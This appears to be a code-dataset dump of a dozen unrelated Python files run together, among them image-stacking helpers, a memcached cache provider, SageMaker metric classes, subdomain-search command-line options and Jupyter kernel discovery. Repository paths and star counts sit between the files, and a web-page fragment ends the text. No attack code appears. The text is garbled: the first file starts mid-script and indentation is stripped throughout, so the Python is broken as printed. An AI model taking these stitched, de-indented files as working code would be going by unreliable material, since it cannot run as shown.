rdehx = hexlify(b58decode(refder)).decode('utf8')
rdphx = hexlify(b58decode(refderp)).decode('utf8')
print('zrhx ' + refhx)
print('zrdvx ' + rdehx)
print('zrdpx ' + rdphx)
import numpy as np
import cv2
def _pad_width_center(w, target_w):
left = (target_w - w) // 2
right = target_w - w - left
return left, right
def _pad_width_right(w, target_w):
return 0, target_w - w
def _pad_height_center(h, target_h):
top = (target_h - h) // 2
bottom = target_h - h - top
return top, bottom
def _pad_height_bottom(h, target_h):
return 0, target_h - h
def VStack(*imgs, align='center'):
max_w = max([_.shape[1] for _ in imgs])
imgs_padded = []
if align == 'center':
for img in imgs:
left, right = _pad_width_center(img.shape[1], max_w)
imgs_padded.append(cv2.copyMakeBorder(img, 0, 0, left, right, cv2.BORDER_CONSTANT))
elif align == 'left':
for img in imgs:
left, right = _pad_width_right(img.shape[1], max_w)
imgs_padded.append(cv2.copyMakeBorder(img, 0, 0, left, right, cv2.BORDER_CONSTANT))
else:
raise ValueError('Unsupported alignment %s' % align)
return np.concatenate(imgs_padded, axis=0)
def HStack(*imgs, align='center'):
max_h = max([_.shape[0] for _ in imgs])
imgs_padded = []
if align == 'center':
for img in imgs:
top, bottom = _pad_height_center(img.shape[0], max_h)
imgs_padded.append(cv2.copyMakeBorder(img, top, bottom, 0, 0, cv2.BORDER_CONSTANT))
elif align == 'top':
for img in imgs:
top, bottom = _pad_height_bottom(img.shape[0], max_h)
imgs_padded.append(cv2.copyMakeBorder(img, top, bottom, 0, 0, cv2.BORDER_CONSTANT))
else:
raise ValueError('Unsupported alignment %s' % align)
return np.concatenate(imgs_padded, axis=1)
def Grid(*imgs, n_col=1, align='center'):
chunks = [imgs[i:i + n_col] for i in range(0, len(imgs), n_col)]
row_imgs = [HStack(*_, align=align) for _ in chunks]
return VStack(*row_imgs, align=align)
1,917
render/scene/SceneGnomon.py
bvraghav/standible
1
2024374
import logging as lg
from utils import Get, Set
from . SceneDefault import SceneDefault
from . Taxonomy import Taxonomy
from . CameraGnomon import CameraGnomon
from . Light import Light
from . Gnomon import Gnomon
from . Render import Render
class SceneGnomon(SceneDefault) :
def setup(self) :
lg.debug(
'Setting up scene from data: %s',
Get.config('runtime/scene')
)
self.clear_scene()
Taxonomy().setup()
CameraGnomon.setup()
Light.setup()
Gnomon.setup()
Render.setup()
523
src/sagemaker_algorithm_toolkit/metrics.py
Chick-star/sagemaker-xgboost-container
1
2024423
# Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the 'License'). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the 'license' file accompanying this file. This file is
# distributed on an 'AS IS' BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
from sagemaker_algorithm_toolkit import exceptions as exc
import logging
class Metric(object):
MAXIMIZE = "Maximize"
MINIMIZE = "Minimize"
def __init__(self, name, regex, format_string=None, tunable=True, direction=None):
self.name = name
self.format_string = format_string
self.direction = direction
self.regex = regex
self.tunable = tunable
if self.tunable and direction is None:
raise exc.AlgorithmError("direction must be specified if tunable is True.")
def log(self, value):
logging.info(self.format_string.format(value))
def format_tunable(self):
return {"MetricName": self.name,
"Type": self.direction}
def format_definition(self):
return {"Name": self.name,
"Regex": self.regex}
class Metrics(object):
def __init__(self, *metrics):
self.metrics = {metric.name: metric for metric in metrics}
def __getitem__(self, name):
return self.metrics[name]
@property
def names(self):
return list(self.metrics)
def format_tunable(self):
metrics = []
for name, metric in self.metrics.items():
if metric.tunable:
metrics.append(metric.format_tunable())
return metrics
def format_definitions(self):
return [metric.format_definition() for name, metric in self.metrics.items()]
import bmemcached
import os
from pysimplecache.providers.base_provider import BaseProvider, \
UnhandledCachingException
class MemcachedProvider(BaseProvider):
""" Memcached Provider """
def __init__(self, conversion, username=None, password=None,
servers=None, enabled=True):
""" Memcached Provider
:param conversion: class for data conversion
:param username: str memcached username
:param password: str memcached password
:param servers: str memcached servers (comma separated)
:param enabled: bool if caching is enabled
"""
self.conversion = conversion
self.cache_enabled = bool(os.getenv('MEMCACHEDCLOUD_ENABLED', enabled))
self.cache_server = os.getenv('MEMCACHEDCLOUD_SERVERS', servers)
self.cache_user = os.getenv('MEMCACHEDCLOUD_USERNAME', username)
self.cache_pass = os.getenv('MEMCACHEDCLOUD_PASSWORD', password)
self._client = self._setup_client()
def _setup_client(self):
""" Setup memcached client
:return: obj memcached client
"""
if self.cache_enabled:
try:
if self.cache_user and self.cache_pass:
return bmemcached.Client(
self.cache_server.split(','),
self.cache_user,
self.cache_pass)
else:
return bmemcached.Client(
self.cache_server.split(','))
except Exception as e:
raise UnhandledCachingException(
'UnhandledCachingException: {}'.format(str(e.message)))
return None
def get(self, key, ttl, method, **kwargs):
""" Get cached data or call passed method
:param key: str key value for cached data
:param ttl: int ttl value for cached data
:param method: obj method call for cache miss
:param kwargs: parameters to pass into method
:return: data, bool cache miss
:raises: UnhandledCachingException
"""
if self._client:
try:
data = self._client.get(key)
# if cache hit then return data decoded and if no
# data present in cache, call method with passed
# arguments and store in cache
if data:
return self.conversion.decode(data), False
else:
# if method is passed, load data and pass into
# memcached with key
if method is not None:
data = method(**kwargs)
self.put(key, ttl, data)
return data, True
else:
return None, True
except Exception as e:
raise UnhandledCachingException(
'UnhandledCachingException: {}'.format(str(e.message)))
finally:
self._client.disconnect_all()
def put(self, key, ttl, data):
""" Put data into cache with passed ttl from referenced method
:param key: str key value for cached data
:param ttl: int ttl value for cached data
:param data: data to pass into cache
:return: None
:raises: UnhandledCachingException
"""
if self._client:
try:
self._client.set(key, self.conversion.encode(data), ttl)
except Exception as e:
raise UnhandledCachingException(
'UnhandledCachingException: {}'.format(str(e.message)))
finally:
self._client.disconnect_all()
def delete(self, key):
""" Delete cached data with passed key
:param key: str key value for cached data
:return: None
:raises: UnhandledCachingException
"""
if self._client:
try:
self._client.delete(key)
except Exception as e:
raise UnhandledCachingException(
'UnhandledCachingException: {}'.format(str(e.message)))
finally:
self._client.disconnect_all()
4,247
subseeker_core/options.py
DFC302/subseeker
19
2022820
# This file contains information regarding command line arguments, title
# information and version information.
import argparse
import sys
from termcolor import colored
# User options
def options():
parser = argparse.ArgumentParser()
# specify domain
parser.add_argument(
"--domain",
help="Specify domain to search.",
action="store",
)
# single search mode
parser.add_argument(
"--singlesearch",
help="Search using a specific certificate site. Use --singlesearch options to list available search options.",
action="store",
type=str,
)
# User can specify keywords instead of a file full of sub keywords
parser.add_argument(
"--keywords",
nargs="+",
help="Add a list of keywords.",
type=str,
)
# Parse subdomain keywords from other tools output files
parser.add_argument(
"--generate",
help="Create a list of sub domain keywords from a file containing \
subdomains.",
action="store_true",
)
# search domain using subdomain keywords from file
parser.add_argument(
"--file",
help="Specify a file containing keywords to parse crt.sh OR to create \
sub keywords from.",
action="store",
)
# Write to output file
parser.add_argument(
"--out",
help="Specify a file to write results too.",
action="store",
)
# User specify number of threads
parser.add_argument(
"--threads",
help="Specify number of threads to be used when performing keyword \
search.",
action="store",
type=int,
)
# Try with different headers, firefox, chrome, opera
parser.add_argument(
"--useragent",
help="Specify a user-agent to use. Default is a firefox UA.",
action="store",
type=str
)
# If API information has been configured, allow use of API credentials
parser.add_argument(
"--api",
help="Turn on api.",
action="store_true",
)
# Specify page number for certdb and/or censys
parser.add_argument(
"--page",
help="Used with certdb and/or censys searchmodes. Specify page number to display.",
action="store",
type=int,
)
parser.add_argument(
"--version",
help="Display version information",
action="store_true",
)
parser.add_argument(
"--verbose",
help="Display extra verbose information, such as errors.",
action="store_true",
)
# if not arguments are given, print usage message
if len(sys.argv[1:]) == 0:
parser.print_help()
parser.exit()
args = parser.parse_args()
return args
2,391
sdk/identity/azure-identity/tests/test_imds.py
kushan2018/azure-sdk-for-python
0
2024566
# ------------------------------------
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
# ------------------------------------
from azure.identity._internal import ImdsCredential
def test_imds_credential():
credential = ImdsCredential()
token = credential.get_token("https://management.azure.com/.default")
assert token
358
String Conversion.py
Darkhunter9/python
0
2023205
def steps_to_convert(line1,line2):
def compare(line1,line2,i):
tempdict = {}
for j in range(len(line1)):
if line1[j] in line2:
try:
tempdict[i+j] = line2.index(line1[j],max(tempdict.values()) if tempdict else 0)
except Exception:
continue
return tempdict
def calculate(line1,line2,similardict):
result = 0
temp3 = -1
temp4 = -1
while similardict:
result += max(min(similardict.keys())-1-temp3,similardict[min(similardict.keys())]-temp4-1)
temp3 = min(similardict.keys())
temp4 = similardict[min(similardict.keys())]
similardict.pop(min(similardict.keys()))
result += max(len(line1)-temp3-1,len(line2)-temp4-1)
return result
result = None
for i in range(len(line1)):
tempdict = {}
tempdict = compare(line1[i:],line2,i)
if result == None:
result = calculate(line1,line2,tempdict)
else:
result = min(result,calculate(line1,line2,tempdict))
for i in range(len(line2)):
tempdict = {}
tempdict = compare(line2[i:],line1,i)
if result == None:
result = calculate(line2,line1,tempdict)
else:
result = min(result,calculate(line2,line1,tempdict))
if result == None:
return 0
else:
return result
if __name__ == "__main__":
#These "asserts" using only for self-checking and not necessary for auto-testing
assert steps_to_convert('line1', 'line1') == 0, "eq"
assert steps_to_convert('line1', 'line2') == 1, "2"
assert steps_to_convert('line', 'line2') == 1, "none to 2"
assert steps_to_convert('ine', 'line2') == 2, "need two more"
assert steps_to_convert('line1', '1enil') == 4, "everything is opposite"
assert steps_to_convert('', '') == 0, "two empty"
assert steps_to_convert('l', '') == 1, "one side"
assert steps_to_convert('', 'l') == 1, "another side"
print("You are good to go!")
2,088
tests/test_io.py
sandralorenz268/hylite
0
2023268
import unittest
import os
from hylite import io
from pathlib import Path
from tempfile import mkdtemp
import shutil
class TestHyImage(unittest.TestCase):
def test_load(self):
self.img = io.load(os.path.join(str(Path(__file__).parent.parent), "test_data/image.hdr"))
self.lib = io.load(os.path.join(str(Path(__file__).parent.parent), "test_data/library.csv"))
self.cld = io.load(os.path.join(str(Path(__file__).parent.parent), "test_data/hypercloud.hdr"))
def test_save(self):
self.test_load() # load datasets
for data in [self.img, self.lib, self.cld]:
pth = mkdtemp()
try:
io.save(os.path.join(pth, "data.hdr"), data )
shutil.rmtree(pth) # delete temp directory
except:
shutil.rmtree(pth) # delete temp directory
self.assertFalse(True, "Error - could not save data of type %s" % str(type(data)))
if __name__ == '__main__':
unittest.main()
995
swap-random.py
jonspeicher/blinkyfun
0
2023835
#!/usr/bin/env python
from blinkytape import tape, player
from patterns import random
from animations import swap
import sys
tape = tape.BlinkyTape.find_first()
pattern = random.Random(tape.pixel_count)
frame_period_sec = float(sys.argv[1])
animation = swap.Swap(pattern, frame_period_sec)
player = player.Player(tape)
player.play_animation(animation, player.FOREVER)
373
environment_kernels/core.py
Cadair/jupyter_conda_kernels
150
2024180
# -*- coding: utf-8 -*-
from __future__ import absolute_import
import os
import os.path
from jupyter_client.kernelspec import (KernelSpecManager, NoSuchKernel)
from traitlets import List, Unicode, Bool, Int
from .envs_conda import get_conda_env_data
from .envs_virtualenv import get_virtualenv_env_data
from .utils import FileNotFoundError, HAVE_CONDA
ENV_SUPPLYER = [get_conda_env_data, get_virtualenv_env_data]
__all__ = ['EnvironmentKernelSpecManager']
class EnvironmentKernelSpecManager(KernelSpecManager):
"""
A Jupyter Kernel manager which dyamically checks for Environments
Given a list of base directories, this class searches for the pattern::
BASE_DIR/NAME/{bin|Skript}/ipython
where NAME is taken to be the name of the environment.
"""
# Take the default home DIR for conda and virtualenv as the default
_default_conda_dirs = ['~/.conda/envs/']
_default_virtualenv_dirs = ['~/.virtualenvs']
# Check for the CONDA_ENV_PATH variable and add it to the list if set.
if os.environ.get('CONDA_ENV_PATH', False):
_default_conda_dirs.append(os.environ['CONDA_ENV_PATH'].split('envs')[0])
# If we are running inside the root conda env can get all the env dirs:
if HAVE_CONDA:
import conda
_default_conda_dirs += conda.config.envs_dirs
# Remove any duplicates
_default_conda_dirs = list(set(map(os.path.expanduser,
_default_conda_dirs)))
conda_env_dirs = List(
_default_conda_dirs,
config=True,
help="List of directories in which are conda environments.")
virtualenv_env_dirs = List(
_default_virtualenv_dirs,
config=True,
help="List of directories in which are virtualenv environments.")
blacklist_envs = List(
["conda__build"],
config=True,
help="Environments which should not be used even if a ipykernel exists in it.")
whitelist_envs = List(
[],
config=True,
help="Environments which should be used, all others are ignored (overwrites blacklist_envs).")
display_name_template = Unicode(
u"Environment ({})",
config=True,
help="Template for the kernel name in the UI. Needs to include {} for the name.")
conda_prefix_template = Unicode(
u"conda_{}",
config=True,
help="Template for the conda environment kernel name prefix in the UI. Needs to include {} for the name.")
virtualenv_prefix_template = Unicode(
u"virtualenv_{}",
config=True,
help="Template for the virtualenv environment kernel name prefix in the UI. Needs to include {} for the name.")
find_conda_envs = Bool(
True,
config=True,
help="Probe for conda environments, including calling conda itself.")
find_r_envs = Bool(
True,
config=True,
help="Probe environments for R kernels (currently only conda environments).")
use_conda_directly = Bool(
True,
config=True,
help="Probe for conda environments by calling conda itself. Only relevant if find_conda_envs is True.")
refresh_interval = Int(
3,
config=True,
help="Interval (in minutes) to refresh the list of environment kernels. Setting it to '0' disables the refresh.")
find_virtualenv_envs = Bool(True,
config=True,
help="Probe for virtualenv environments.")
def __init__(self, *args, **kwargs):
super(EnvironmentKernelSpecManager, self).__init__(*args, **kwargs)
self.log.info("Using EnvironmentKernelSpecManager...")
self._env_data_cache = {}
if self.refresh_interval > 0:
try:
from tornado.ioloop import PeriodicCallback, IOLoop
# Initial loading NOW
IOLoop.current().call_later(0, callback=self._update_env_data, initial=True)
# Later updates
updater = PeriodicCallback(callback=self._update_env_data,
callback_time=1000 * 60 * self.refresh_interval)
updater.start()
if not updater.is_running():
raise Exception()
self._periodic_updater = updater
self.log.info("Started periodic updates of the kernel list (every %s minutes).", self.refresh_interval)
except:
self.log.exception("Error while trying to enable periodic updates of the kernel list.")
else:
self.log.info("Periodical updates the kernel list are DISABLED.")
def validate_env(self, envname):
"""
Check the name of the environment against the black list and the
whitelist. If a whitelist is specified only it is checked.
"""
if self.whitelist_envs and envname in self.whitelist_envs:
return True
elif self.whitelist_envs:
return False
if self.blacklist_envs and envname not in self.blacklist_envs:
return True
elif self.blacklist_envs:
# If there is just a True, all envs are blacklisted
return False
else:
return True
def _update_env_data(self, initial=False):
if initial:
self.log.info("Starting initial scan of virtual environments...")
else:
self.log.debug("Starting periodic scan of virtual environments...")
self._get_env_data(reload=True)
self.log.debug("done.")
def _get_env_data(self, reload=False):
"""Get the data about the available environments.
env_data is a structure {name -> (resourcedir, kernel spec)}
"""
# This is called much too often and finding-process is really expensive :-(
if not reload and getattr(self, "_env_data_cache", {}):
return getattr(self, "_env_data_cache")
env_data = {}
for supplyer in ENV_SUPPLYER:
env_data.update(supplyer(self))
env_data = {name: env_data[name] for name in env_data if self.validate_env(name)}
new_kernels = [env for env in list(env_data.keys()) if env not in list(self._env_data_cache.keys())]
if new_kernels:
self.log.info("Found new kernels in environments: %s", ", ".join(new_kernels))
self._env_data_cache = env_data
return env_data
def find_kernel_specs_for_envs(self):
"""Returns a dict mapping kernel names to resource directories."""
data = self._get_env_data()
return {name: data[name][0] for name in data}
def get_all_kernel_specs_for_envs(self):
"""Returns the dict of name -> kernel_spec for all environments"""
data = self._get_env_data()
return {name: data[name][1] for name in data}
def find_kernel_specs(self):
"""Returns a dict mapping kernel names to resource directories."""
# let real installed kernels overwrite envs with the same name:
# this is the same order as the get_kernel_spec way, which also prefers
# kernels from the jupyter dir over env kernels.
specs = self.find_kernel_specs_for_envs()
specs.update(super(EnvironmentKernelSpecManager,
self).find_kernel_specs())
return specs
def get_all_specs(self):
"""Returns a dict mapping kernel names and resource directories.
"""
# This is new in 4.1 -> https://github.com/jupyter/jupyter_client/pull/93
specs = self.get_all_kernel_specs_for_envs()
specs.update(super(EnvironmentKernelSpecManager, self).get_all_specs())
return specs
def get_kernel_spec(self, kernel_name):
"""Returns a :class:`KernelSpec` instance for the given kernel_name.
Raises :exc:`NoSuchKernel` if the given kernel name is not found.
"""
try:
return super(EnvironmentKernelSpecManager,
self).get_kernel_spec(kernel_name)
except (NoSuchKernel, FileNotFoundError):
venv_kernel_name = kernel_name.lower()
specs = self.get_all_kernel_specs_for_envs()
if venv_kernel_name in specs:
return specs[venv_kernel_name]
else:
raise NoSuchKernel(kernel_name)
# Copyright (c) 2017, <NAME> University. All rights reserved.
#
# Use of the K-NRM package is subject to the terms of the software license set
# forth in the LICENSE file included with this software, and also available at
# https://github.com/AdeDZY/K-NRM/blob/master/LICENSE
from os import path
ROOTPATH = path.dirname(path.dirname(path.dirname(path.abspath(__file__))))
query_field = 'query'
title_field = 'title'
body_field = 'body'
438
python/hardway/ex17_1.py
petervdb/eLearning
0
2024442
from sys import argv
from os.path import exists
# short version of ex17_0.py
# The script requires 2 arguments. The original filename and the new filename
script, from_file, to_file = argv
print "Copying from %s to %s" % (from_file, to_file)
indata = open(from_file).read()
out_file = open(to_file, 'w')
out_file.write(indata)
out_file.close()
349
LocaleStringBuilder.py
FlasHAdi/LocaleString-LocaleQuest-Builder
0
2024497
__author__ = "Owsap"
__copyright__ = "Copyright 2020, Owsap Productions"
__license__ = "MIT"
__version__ = "1.0.0"
import os
import sys
import logging
LOG_FILE_NAME = "LocaleStringBuilder.log" # Log file
LOCALE_STRING_FILE = "locale_string.txt" # Locale string file name
LOCALE_STRING_BASE_FILE = "share/locale_string_vnum.txt" # Reference file name (String VNUM)
if not os.path.exists("log"):
os.mkdir("log")
logging.basicConfig(filename = "log/" + LOG_FILE_NAME, level = logging.DEBUG, format = '%(asctime)s %(message)s', datefmt = '%d/%m/%Y %H:%M:%S')
def GetLocaleStringFile(locale):
return "locale/%s/%s" % (locale, LOCALE_STRING_FILE)
def TransalteLocaleString(locale):
if not os.path.exists(LOCALE_STRING_BASE_FILE):
print "Reference file not found. %s" % LOCALE_STRING_BASE_FILE
logging.warning("Reference file not found. %s" % LOCALE_STRING_BASE_FILE)
return
localeStringOutput = "locale_string_%s.txt" % locale
if os.path.exists(localeStringOutput):
os.remove(localeStringOutput)
fileOutput = open(localeStringOutput, 'a')
for line in open(LOCALE_STRING_BASE_FILE, 'r'):
split = line.split('";')
vnum = split[0][1:]
if not vnum:
print ""
fileOutput.write("")
if not vnum.isdigit():
formated = split[0] + "\";"
print (formated.rsplit("\n", 1)[0])
fileOutput.write(formated.rsplit("\n")[0] + "\n")
continue
print GetTranslationVnum(locale, vnum)
fileOutput.write(GetTranslationVnum(locale, vnum) + "\n")
fileOutput.close()
def GetTranslationVnum(locale, vnum):
lineCount = 0
for line in open(GetLocaleStringFile(locale), 'r'):
lineCount += 1
match = line.find(vnum)
if match == 0:
localeStringFile = open(GetLocaleStringFile(locale), 'r')
localeText = str(localeStringFile.readlines()[lineCount - 1])
split = localeText.split("\t")
formated = "\"" + split[1]
return (formated.rsplit("\n", 1)[0]) + "\";"
if __name__ == "__main__":
if len(sys.argv) < 2:
print "USAGE: [locale]"
locale = raw_input("Enter locale name: ")
TransalteLocaleString(str(locale))
elif len(sys.argv) == 2:
TransalteLocaleString(sys.argv[1])
2,189
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.